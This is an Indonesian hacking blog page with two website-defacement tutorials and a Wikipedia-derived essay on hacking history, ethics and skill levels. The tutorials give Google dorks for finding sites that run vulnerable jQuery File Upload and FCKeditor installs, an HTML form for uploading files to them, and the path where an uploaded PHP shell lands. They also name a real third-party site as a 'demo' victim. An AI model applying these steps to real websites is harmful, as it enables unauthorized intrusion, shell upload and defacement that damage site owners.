Minggu, 13 Maret 2016

Tutorial Deface Dengan Jquery File Upload Vulnerability

Hallo Sobat Sekarang Saya Akan Membagikan Tutorial Kepada Anda :D .

Kalau Begitu Silahkan Baca Artikel Dibawah Ini Vro :v





▐ Dork : inurl:/jquery-file-upload/
▐ Exploit : http://targetkamu.com/(path)/jquery-file-upload/server/php/

Exploit CSRF nya :

<form method="POST" action="http://localhost/dir/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>


Nih Yang Belum Tau Apa Itu CSRF    Lihat Disini »

Contoh Target Vulnnya , Kalau Website Tersebut Bertuliskan "{:[files]}" Mungkin Tulisannya Kayak Begitu :D

Klau Sudah Gunakan CSRFnya

Path Upload : /jquery-file-upload/server/php/files/shellkamu.php


Source : https://www.exploit-db.com/

Facebook : https://www.facebook.com/marselERROR

Fanspage : https://www.facebook.com/Ghosts.phtml

Forum : http://forum.phantom-ghost.org


Tutorial Deface Dengan FCKeditor File Upload Vulnerability

Ketemu Lagi Nih...!!!!!

Hy...!!! , Sekarang Saya Akan Membahas Tutorial Deface Dengan FCKeditor File Upload Vulnerability .

Klau Sudah Ada Yang Tau Cara Deface Dengan Teknik Ini (Mastah) , Kelaut Aja Dulu .

Biarkan Para Newbie Belajar . 

Ok Kalau Gitu Tanpa Perlu Basa Basi , Langsung Aja Ke TKP





Dork ; inurl:/filemanager/upload/ intitle:index of ( Kembangin Lagi Yah Biar Dapat Banyak ) 

Yang Belum Tau Apa Itu Dork  
Baca selengkapnya »

Exploit : /filemanager/upload/test.html atau /filemanager/upload/uploadtest.html

Masukkan Dork Tersebut Di Google . Nanti Akan Ada Kumpulan Website :D

Masuk Ke Salah Satu Website . Kemudian Masuk Ke Web Tersebut

Gunakan Exploit Yang Ada Diatas Tadi  . Ganti Box Yang Bernamakan ASP menjadi PHP

Kalau Sudah , Tinggal Upload File Kalian Deh

Yg Pada Box Bertuliskan Choose File

Ingat File Yang Cuman Bisa Di Upload Yang Berforman *jpg , *txt *doc *html *pdf

Ok . Terus Klau Sudah Di Upload , Jika Berhasil Maka Akan Ada Tulisan "Files Weres Uploaded"

Klau Mau Dilihat Hasilnya Tinggal , Lihat Disamping kanan Box :D

Copykan Diatas :v

contoh :

klau di dalam box bertuliskan "/upload/Ghost.txt"

Tinggal Dimasukkan Saja www.contoh.com/upload/Ghost.txt

Selesai Deh , Bagaimana .? Mudah Kan , Sisa Praktekin Aja :D

*Gunakan Dengan Bijak*

Demo :

http://www.parentsassn.org.hk/fckeditor/editor/filemanager/upload/test.html

Demo Akses File ;

http://www.parentsassn.org.hk/upload/Ghost.txt


Thanks To :  All Member PhantomGhost - All Member Sulawesi IT Sec - Mr.3RR0R

Facebook : https://www.facebook.com/marselERROR

Fanspage : https://www.facebook.com/Ghosts.phtml

Forum : http://forum.phantom-ghost.org












Apa Itu Hacking

Hy Semua..!!!!

Sebelum Saya Membahas Ini Perkenalkan Saya Mr.3RR0R :v :v

Kenapa Saya Mempost Ini Terlebih Dahulu.

Karena Sebelum Saya Memposting Tutor Hacking , Pasti Kita Harus Tau Dulu Pengertian Hacking 

Dan Sejarahnya . Oke Tanpa Perlu Basa Basi Lagi Langsung Aja Ke TKP . 


Sejarah Tentang Hacking



Terminologi peretas muncul pada awal tahun 1960-an di antara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputermainframe. Kata bahasa Inggris "hacker" pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik daripada yang telah dirancang bersama.

Kemudian pada tahun 1983, istilah hacker mulai berkonotasi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414syang berbasis di Milwaukee, Amerika Serikat. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri sebagai peretas, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Peretas sejati menyebut orang-orang ini cracker dan tidak suka bergaul dengan mereka. Peretas sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Peretas sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi peretas.

Para peretas mengadakan pertemuan tahunan, yaitu setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan peretas terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas peretasan.
Peretas memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa peretaslah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode virus, dan lain-lain, padahal mereka adalah crackerCracker-lah menggunakan celah-celah keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya paraperetas dipahami dibagi menjadi dua golongan: White Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah Black Hat Hackers

Etika peretas



  • Di atas segalanya, hormati pengetahuan & kebebasan informasi.
  • Memberitahukan sistem administrator akan adanya pelanggaran keamanan/lubang di keamanan yang anda lihat.
  • Jangan mengambil keuntungan yang tidak fair dari hack.
  • Tidak mendistribusikan & mengumpulkan software bajakan.
  • Tidak pernah mengambil risiko yang bodoh
  • Selalu mengetahui kemampuan sendiri.
  • Selalu bersedia untuk secara terbuka/bebas/gratis memberitahukan & mengajarkan berbagai informasi & metode yang diperoleh.
  • Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
  • Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
  • Tidak pernah secara sengaja menghapus & merusak file di komputer yang diretas.
  • Hormati mesin yang diretas, dan perlakukan dia seperti mesin sendiri.



Tingkatan-Tingkatan Peretas




Elite


     Juga dikenal sebagai 3l33t, 3l337, 31337, leet, 1337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka memahami sistem operasi sisi luar dalam, sanggup mengkonfigurasi dan menyambungkan jaringan secara global. Sanggup melakukan pemrograman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya efisien & terampil, menggunakan pengetahuannya dengan tepat. Mereka seperti siluman yang dapat memasuki sistem tanpa terdeteksi, walaupun mereka tidak akan menghancurkan data-data yang ditemui. Karena mereka selalu mengikuti peraturan yang ada.

Semi elite


      Hacker ini biasanya lebih muda daripada Elite. Mereka juga mempunyai kemampuan dan pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya (vulnerability)). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh hacker tingkat ini. Sialnya oleh para Elite mereka sering kali dikategorikan Lamer.

Developed kiddie

     Sebutan ini terutama karena umur kelompok ini masih muda (ABG) dan masih sekolah. Mereka membaca tentang metode hacking dan caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil dan memproklamasikan kemenangan ke peretas lainnya. Umumnya mereka masih menggunakan Grafic User Interface (GUI) dan baru belajar hal dasar dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

Script kiddie

     Seperti developed kiddie, Script Kiddie biasanya melakukan aktivitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti dan menyusahkan hidup pengguna Internet.

Lamer

       Mereka adalah orang tanpa pengalaman dan pengetahuan yang ingin menjadi peretas (wanna-be hacker). Mereka biasanya membaca atau mendengar tentang hacker dan ingin menjadi seperti mereka. Penggunaan komputer mereka hanyalah untuk main game, IRC, tukar-menukar perangkat lunak bajakan dan mencuri kartu kredit. Melakukan hacking menggunakan perangkat lunak trojan, nuke, dan DoS. Biasanya menyombongkan diri melalui IRC channel. Karena banyak kekurangan untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai tingkat developed kiddie atau script kiddie saja.


Source :  https://id.wikipedia.org

My Facebook : https://m.facebook.com/MarselERROR